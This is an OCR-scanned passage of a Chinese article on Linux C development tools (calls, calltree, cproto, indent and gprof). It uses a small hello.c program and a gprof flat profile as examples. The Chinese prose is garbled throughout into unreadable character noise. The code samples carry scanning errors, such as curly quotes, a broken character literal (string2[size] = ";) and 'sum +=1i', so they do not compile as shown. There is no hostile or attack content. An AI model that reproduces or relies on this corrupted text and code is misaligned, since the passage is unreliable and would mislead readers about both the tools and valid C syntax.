2] Jusr/bin H3k. 4. #8404 calls.1 133 H 3% /usr/man/manl . 5. MR
/tmp/calls H3. XSG calls FEFF e TR W22 358K R 45 L.

2 calls TE1H I BRERGE RN, &7 R HUR T HI 65 545 T BR BT A2 SRR SO 440

main [hello.c]
WA RBOIEA L) calls 45 HISCAF TR, calls AN i FH (M ek ek B, IR
WoRERH A T

printf
calls ANxf i I R A R Hm L. 38 U BREUR 7S T T AOA: 77

fact <<< recursive in factorial.c >>>
RS BRI BoR:

total [static in calculate.c]
fER—A1F, A calls 43N

#include <stdio.h>

static void my_print (char *);
static void my_print2 (char *);

main ()

{

char my_string[] = “hello world!”;
my_print (my_string);

my_print2 (my_string);

my_print (my_string);

}

void count_sum()

{

int i,sum=0;

for(i=0; i<1000000; i++)
sum +=i;

}

void my_print (char *string)

{

count_sum();
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printf (“The string is %s “, string);
}

void my_print2 (char *string)
{
char *string2;

int size, i,sum =0;

count_sum();

size = strlen (string);

string2 = (char *) malloc (size + 1);

for (i = 0; i < size; i++) string2[size -1 - i] = string[i];
string2[size] = ";

for(i=0; i<5000000; i++)

sum += i;

printf (“The string printed backward is %s “, string2);

}
e Ay i -

1 __underflow [hello.c]

2 main

3 my_print [hello.c]

4 count_sum [hello.c]

5 printf

6 my_print2 [hello.c]

7 count_sum

8 strlen

9 malloc

10 printf

calls ARZ iy SATHIOR BCE AR I H RS 5, AL E 25 BiES % calls
M oL A RAE 24T LN calls -h .

calltree

calltree 5 calls 286, 1T far it R AR M B4, A L E NG B
AT LA sunsite.unc.edu FTP 3 £ T i H 4%
:/pub/Linux/devel/lang/c/calltree.tar.gz 743 calltree.

cproto

cproto 2N C YRFE/T A F 8 RN R AR . B cproto T DAYE S FE I
AR R K s SRR B TR e ().

WRARLLE cproto Ab3F IR AS (cproto hello.c):

#include <stdio.h>
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static void my_print (char *);
static void my_print2 (char *);

main ()

{

char my_string[] = “hello world!”;
my_print (my_string);

my_print2 (my_string);

}

void my_print (char *string)

{
printf (“The string is %s “, string);
}

void my_print2 (char *string)

{
char *string2;

int size, i;

size = strlen (string);

string2 = (char *) malloc (size + 1);
for (i = 0; i < size; i++)
string2[size -1 - i] = string[i];
string2[size] = ";

printf (“The string printed backward is %s “, string2);
}

PRREAFEN N IR 4 -

/* hello.c */

int main(void);

int my_print(char *string);

int my_print2(char *string);
XA AT DA [f) 31— AN 5 SCeR UL A 35 SO L

indent

indent SEAIFEZ Linux HLAE A0S —AMgifE s H TR IS TR AR Bt A AR B AR
g A= SR e 1k O X, indent AT R 22 JETORSR 2 U At AR AR A JRAX AL X 2834 150

I 215 BAlE indent (48R UL, 7EMA4T LEEX indent -h .
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N T2 indent Ik i

iZ47 indent AT C fUHS:

#include <stdio.h>

static void my_print (char *);
static void my_print2 (char *);

main ()

{

char my_string[] = “hello world!”;
my_print (my_string);

my_print2 (my_string);

}

void my_print (char *string)

{

printf (“The string is %s “, string);
}

void my_print2 (char *string)
{

char *string2; int size, i;

size = strlen (string);
string2 = (char *) malloc (size + 1);
for (i = 0; i < size; i++) string2[size -1 - i] = string[i];

string2[size] = ";

printf (“The string printed backward is %s “, string2);

}
iZ4T indent J5i C ARAY:

#include <stdio.h>

static void my_print (char *);
static void my_print2 (char *);
main ()

{

char my_string[] = “hello world!”;
my_print (my_string);

my_print2 (my_string);

}
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void

my_print (char *string)

{

printf (“The string is %s “, string);

}

void

my_print2 (char *string)

{

char *string2;

int size, i;

size = strlen (string);

string2 = (char *) malloc (size + 1);

for (i = 0; i < size; i++)

string2[size - 1 - i] = string[i];

string2[size] = ";

printf (“The string printed backward is %s “, string2);
}

indent JFAHCRARIS I SN 2, TR SCRARI O SRR, A e AR 19 S AT e, XKL A2
A

gprof
gprof 2 AE/EARIN Linux REZH Jusr/bin B3 FIG— M. EAIRAEBIHT ORI R

J3P DT R R D A8 1 1S 2 A T N 3 2 I ).

gprof H 5 VR{RR > HLREAS bR SO i FH TR O RS BR BSCshAT I P o I RO 1 20 B ARt
A R AR AR PP RE AT R L8 BARR A .

H T AEVRIORLE B4 gprof, #RAZRAEG RPN L -pg LI, SO P AERRR
PATH FEAE— gmon.out [{3CHE. gprof HIX AN SO = AT E B

LEARIEAT TARIREE I 726 T gmon.out SCAFJEAREEH] N IR fir &3R5I (5 B :

gprof <program_name>
240 program_name J&7=/E gmon.out TR 194 T

T VLI, AEREFP TN T R %L count_sum() LA AE CPU INIR), F it

#include <stdio.h>

static void my_print (char *);

static void my_print2 (char *);
main ()

{

char my_string[] = “hello world!”;
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my_print (my_string);
my_print2 (my_string);
my_print (my_string);
}

void count_sum()

{

int i,sum=0;

for(i=0; i<1000000; i++)
sum +=1i;

}

void my_print (char *string)

{

count_sum();

printf (“The string is %s “, string);
}

void my_print2 (char *string)
{
char *string2;

int size, i,sum =0;

count_sum();

size = strlen (string);

string2 = (char *) malloc (size + 1);

for (i = 0; i < size; i++) string2[size -1 - i] = string[i];
string2[size] = ";

for(i=0; i<5000000; i++)

sum += i;

printf (“The string printed backward is %s “, string2);
}

$ gcc -pg -o hello hello.c

$ ./hello

$ gprof hello | more

A LE LU o

Flat profile:

Each sample counts as 0.01 seconds.

% cumulative self self total

time seconds seconds calls us/call us/call name
69.23 0.09 0.09 1 90000.00 103333.33 my_print2
30.77 0.13 0.04 3 13333.33 13333.33 count_sum

% 83 5l It 84 W



Linux #:E RS F c il S aifE ]

0.00 0.13 0.00 2 0.00 13333.33 my_print

% AT L BR BT 7 PRI T o R A
time $RAT IR F1 70 L

cumulative RUIFFPEL AT I 8 BP9 1R I (1)
seconds  CHLHE I R 0 FH e BB E 2 I TR)D

self AT I R BAE 2 A 1)
seconds  Cif L& B EAE R I LAV FEAE D

calls 4 FH %%

self &3 LT I BR E0TE 98 T IORD 1) 1]
us/call

total AT R E I e e s
us/call 1& 2% [FI30FD i 1]

name R4

I EL B AT LA, AT my_print() s AR S5 BAE St A ], HE S ST T
count_sum() &%, Jrll R4 0.13.

B35 gprof 7 AL AT B ARR, i SRR ASUR: 2o e B dfs 10 18 de 4T i R 1) B A

SCAHL
SCERYR: http://www.linuxaid.com.cn/support/showfom.jsp?i=1461
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